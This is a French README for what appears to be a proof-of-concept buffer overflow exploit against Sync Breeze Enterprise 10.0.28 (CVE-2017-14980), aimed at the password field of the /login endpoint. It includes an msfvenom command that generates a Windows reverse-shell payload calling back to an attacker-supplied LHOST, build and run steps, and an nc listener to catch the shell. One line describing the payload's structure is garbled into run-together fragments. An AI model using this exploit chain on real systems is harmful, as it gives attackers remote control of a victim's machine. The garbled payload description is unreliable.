
Exploit de dépassement de tampon (buffer overflow) de preuve de concept pour Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Envoie une charge utile HTTP POST spécialement conçue pour écraser EIP et exécuter un shellcode x86 personnalisé pour une exécution de code arbitraire.
Ce dépôt contient une preuve de concept d'exploit de débordement de tampon (BOF) pour Sync Breeze Enterprise version 10.0.28, ciblant la vulnérabilité identifiée comme CVE-2017-14980.
La vulnérabilité existe en raison d'une validation incorrecte des entrées lors du traitement du champ password dans une requête POST vers le point de terminaison /login.
Un attaquant peut envoyer une valeur trop longue dans ce champ, ce qui écrase le EIP et permet l'exécution de code arbitraire.
Cet exploit envoie une charge utile soigneusement conçue composée de :
'A')passwordgcc)\x83\x0C\x09\x10) et du shellcode si nécessaireExemple de génération de shellcode avec msfvenom :
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
gcc exploit.c -o exploit
./exploit
nc -nlvp 4444